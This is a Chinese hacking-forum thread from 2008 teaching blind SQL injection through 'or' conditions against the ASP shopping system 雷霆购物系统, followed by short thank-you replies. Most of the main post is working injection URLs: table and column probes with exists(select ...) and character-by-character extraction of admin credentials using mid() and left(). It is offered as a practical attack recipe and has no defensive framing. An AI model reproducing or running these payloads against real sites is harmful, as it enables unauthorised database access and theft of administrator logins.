★我要吧★

 找回密码
 注册[Register]
搜索
qq空间相册密码查看为什么登陆后需要激活无法注册?

新Or 1=1的脚本注入技术详解

[复制链接]
发表于 2008-3-12 13:55:09 | 显示全部楼层 |阅读模式
记得一年前火狐有一位朋友问,如果一个站过滤了and和"’"的话,改怎么注入啊?当时我随口说了句"or注入",后来又一次看贴的时候,看到他问我该怎么利用呢?我就写了几个简单的语句给他,叫他自己变换,他很感激我,还说网上没有这种方法。我到网上查了查,还真没有or注入专题呢(or 1=1除外),呵呵,所以,一年后的今天,就有了这篇文章。
我们用雷霆购物系统做or注入演示。我们先用or 1=1和or 1=2来测试是否存在注入点,我们先来看正常页面的面貌。我们现在用or 1=1测试是否存在注入漏洞。返回的是另外一个页面,我们再来测试or 1=2。返回的是正常的页面,说明猜测正确的时候是错误,猜测错误的时候是正常,这就是真正的"假是真时真是假",比lake2大哥哥的IP欺骗更经典哦,呵呵。
我们来构造测试语句:

vpro.asp?id=1 or exists(select * from admin)
返回错误页面,说明存在admin表我们来换一个表试试!

vpro.asp?id=1 or exists(select * from n0h4ck)
说明不存在n0h4ck这个表。
我们继续来,构造语句

vpro.asp?id=1 or exists(select admin from admin)
返回or 1=1的页面,说明admin表存在admin字段。

vpro.asp?id=1 or exists(select padd from admin)
返回or 1=2的页面,说明admin表不存在padd字段。
我们现在开始猜测数据了,

vpro.asp?id=1 or (select mid(admin,1,1) from admin)=’n’
返回or 1=2的页面,说明admin表admin字段的第一个数据的第一个字符不是"n"。
我们再来

vpro.asp?id=1 or (select mid(admin,1,1) from admin)=’a’
返回or 1=1的页面,说明说明admin表admin字段的第一个数据的第一个字符是"a",我们第一个会想到什么呢?当然是"admin"啦。
我们用left函数确定一下,

vpro.asp?id=1 or (select left(admin,5) from admin)=’admin’
猜测正确,的确是admin,好了,后面的话就不用我说了吧
发表于 2009-4-14 20:52:51 | 显示全部楼层
谢谢分享辛苦了
发表于 2009-4-18 16:53:38 | 显示全部楼层
太复杂了理解起来有难度
发表于 2009-4-18 18:58:12 | 显示全部楼层
写得非常好~辛苦啦!谢谢!:hug:
发表于 2009-5-11 01:02:54 | 显示全部楼层
不错的分享,谢谢楼主了
发表于 2009-5-11 01:19:39 | 显示全部楼层
有的时候不认真看的话还真看不明白呢
发表于 2009-5-11 01:39:48 | 显示全部楼层
忽然是
发表于 2009-5-11 01:45:35 | 显示全部楼层
路过回下贴:hug:
发表于 2009-6-22 13:45:15 | 显示全部楼层
晕 基本看不太明白
头像被屏蔽
发表于 2010-7-3 10:28:34 | 显示全部楼层
谢谢楼主的分享!学习了
您需要登录后才可以回帖 登录 | 注册[Register]

本版积分规则

QQ|手机版|小黑屋|☆我要吧☆ ( 豫ICP备13016831号-1 )

GMT+8, 2024-11-23 11:12 , Processed in 0.065271 second(s), 23 queries .

Powered by abc369 X3.4

© 2001-2023 abc369.

快速回复 返回顶部 返回列表